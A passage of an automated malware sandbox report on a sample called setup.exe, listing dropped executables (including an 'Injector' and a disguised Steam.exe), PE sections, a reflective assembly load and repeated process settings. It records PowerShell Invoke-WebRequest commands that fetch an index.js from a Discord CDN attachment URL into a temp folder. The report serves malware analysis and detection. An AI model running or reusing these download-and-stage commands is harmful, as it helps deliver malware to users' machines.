                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom\trap.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom\zalgo.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\america.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\rainbow.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\random.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\zebra.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system\has-flag.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system\supports-colors.js
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\88c8a67e-b76c-5548-94d2-8ef2a7b533d5Jump to behavior
                        Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D3DCompiler_47.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2487882361.000000000321F000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2342047181.00000000009E0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2342732409.0000000003EA0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2357494956.0000000004F60000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2343229505.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2343681612.0000000004040000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2358387982.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2336864238.0000000004010000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2336456237.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2352993005.0000000005030000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\libEGL.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2495223655.0000000003F2D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\dev\test\Release\test.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2570536977.0000000003422000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2489150717.0000000003211000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2339494064.0000000003FC0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2337741119.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2354920236.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D3DCompiler_47.pdbGCTL source: okdtlfsk.k4u3.exe, 0000000B.00000003.2487882361.000000000321F000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2336864238.0000000004010000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2336456237.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2352993005.0000000005030000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: okdtlfsk.k4u1.exe, 00000009.00000003.2339494064.0000000003FC0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2337741119.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2354920236.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2565575559.000000000322B000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2483878531.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2342047181.00000000009E0000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2342732409.0000000003EA0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2357494956.0000000004F60000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: okdtlfsk.k4u1.exe, 00000009.00000003.2343229505.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, okdtlfsk.k4u1.exe, 00000009.00000003.2343681612.0000000004040000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2358387982.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: okdtlfsk.k4u3.exe, 0000000B.00000003.2482695452.0000000004720000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2479696981.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2479474213.0000000003AA0000.00000004.00001000.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: Yara matchFile source: 10.0.okdtlfsk.k4u2.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: okdtlfsk.k4u0.exe.1.dr, -.cs.Net Code: _E061 System.Reflection.Assembly.Load(byte[])
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'"
                        Source: okdtlfsk.k4u1.exe.1.drStatic PE information: section name: .textbss
                        Source: okdtlfsk.k4u2.exe.1.drStatic PE information: section name: .code
                        Source: ffmpeg.dll.11.drStatic PE information: section name: .gxfg
                        Source: ffmpeg.dll.11.drStatic PE information: section name: .retplne
                        Source: ffmpeg.dll.11.drStatic PE information: section name: _RDATA
                        Source: libEGL.dll.11.drStatic PE information: section name: .gxfg
                        Source: libEGL.dll.11.drStatic PE information: section name: .retplne
                        Source: libEGL.dll.11.drStatic PE information: section name: _RDATA
                        Source: libGLESv2.dll.11.drStatic PE information: section name: .gxfg
                        Source: libGLESv2.dll.11.drStatic PE information: section name: .retplne
                        Source: libGLESv2.dll.11.drStatic PE information: section name: _RDATA
                        Source: fastlist-0.3.0-x64.exe.11.drStatic PE information: section name: _RDATA
                        Source: Steam.exe.11.drStatic PE information: section name: .gxfg
                        Source: Steam.exe.11.drStatic PE information: section name: .retplne
                        Source: Steam.exe.11.drStatic PE information: section name: .rodata
                        Source: Steam.exe.11.drStatic PE information: section name: CPADinfo
                        Source: Steam.exe.11.drStatic PE information: section name: LZMADEC
                        Source: Steam.exe.11.drStatic PE information: section name: _RDATA
                        Source: Steam.exe.11.drStatic PE information: section name: malloc_h
                        Source: Steam.exe.11.drStatic PE information: section name: prot
                        Source: vk_swiftshader.dll.11.drStatic PE information: section name: .gxfg
                        Source: vk_swiftshader.dll.11.drStatic PE information: section name: .retplne
                        Source: vk_swiftshader.dll.11.drStatic PE information: section name: _RDATA
                        Source: vulkan-1.dll.11.drStatic PE information: section name: .gxfg
                        Source: vulkan-1.dll.11.drStatic PE information: section name: .retplne
                        Source: vulkan-1.dll.11.drStatic PE information: section name: _RDATA
                        Source: ffmpeg.dll0.11.drStatic PE information: section name: .gxfg
                        Source: ffmpeg.dll0.11.drStatic PE information: section name: .retplne
                        Source: ffmpeg.dll0.11.drStatic PE information: section name: _RDATA
                        Source: libEGL.dll0.11.drStatic PE information: section name: .gxfg
                        Source: libEGL.dll0.11.drStatic PE information: section name: .retplne
                        Source: libEGL.dll0.11.drStatic PE information: section name: _RDATA
                        Source: libGLESv2.dll0.11.drStatic PE information: section name: .gxfg
                        Source: libGLESv2.dll0.11.drStatic PE information: section name: .retplne
                        Source: libGLESv2.dll0.11.drStatic PE information: section name: _RDATA
                        Source: Steam.exe0.11.drStatic PE information: section name: .gxfg
                        Source: Steam.exe0.11.drStatic PE information: section name: .retplne
                        Source: Steam.exe0.11.drStatic PE information: section name: .rodata
                        Source: Steam.exe0.11.drStatic PE information: section name: CPADinfo
                        Source: Steam.exe0.11.drStatic PE information: section name: LZMADEC
                        Source: Steam.exe0.11.drStatic PE information: section name: _RDATA
                        Source: Steam.exe0.11.drStatic PE information: section name: malloc_h
                        Source: Steam.exe0.11.drStatic PE information: section name: prot
                        Source: Injector.11.drStatic PE information: section name: .code
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B88752B push ebx; iretd 1_2_00007FFD9B88756A
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_05459520 push 300544CFh; iretd 7_2_05459525
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_0545806A pushad ; ret 7_2_05458071
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00836A80 push edx; ret 9_3_00836A81
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00834C95 push es; retf 9_3_00834C91
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00834C62 push es; retf 9_3_00834C91
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00835E69 push ebx; iretd 9_3_00835E6A
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_008347A2 push ebp; iretd 9_3_008347A3
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_008361E2 push eax; retf 9_3_008361F1
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00834130 pushad ; ret 9_3_00834138
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00832F50 push eax; retf 9_3_00832F51
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00834170 push ecx; iretd 9_3_0083417C
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00836777 push esi; ret 9_3_00836782
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_007DC01A push ds; iretd 9_2_007DC036
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_008312F4 push ecx; ret 9_2_00831307
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_007D1436 push ds; retf 9_2_007D143B
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_007DE5F8 push ebx; ret 9_2_007DE5F9
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A93EE9 push ebx; iretd 17_3_02A93EEA
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A92CE2 push es; retf 17_3_02A92D11
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A92822 push ebp; iretd 17_3_02A92823
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A94262 push eax; retf 17_3_02A94271
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A921B0 pushad ; ret 17_3_02A921B8
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A921F0 push ecx; iretd 17_3_02A921FC
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A947F7 push esi; ret 17_3_02A94802
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A90FD0 push eax; retf 17_3_02A90FD1
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A94B00 push edx; ret 17_3_02A94B01
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A92D15 push es; retf 17_3_02A92D11
                        Source: okdtlfsk.k4u0.exe.1.drStatic PE information: section name: .text entropy: 7.254427804670566
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\d3dcompiler_47.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\libEGL.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\ffmpeg.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\libGLESv2.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\app.asar.unpacked\node_modules\ps-list\vendor\fastlist-0.3.0-x86.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\ffmpeg.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\app.asar.unpacked\node_modules\ps-list\vendor\fastlist-0.3.0-x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\nsis7z.dllJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\Steam.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\System.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\libGLESv2.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\nsExec.dllJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\vk_swiftshader.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\StdUtils.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\vulkan-1.dllJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\libEGL.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\elevate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\InjectorJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\InjectorJump to dropped file
                        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup.exe.logJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\LICENSE.electron.txtJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile created: C:\Users\user\AppData\Local\Programs\Steam\LICENSE.electron.txtJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\cliui\LICENSE.txt
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\cliui\node_modules\emoji-regex\LICENSE-MIT.txt
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
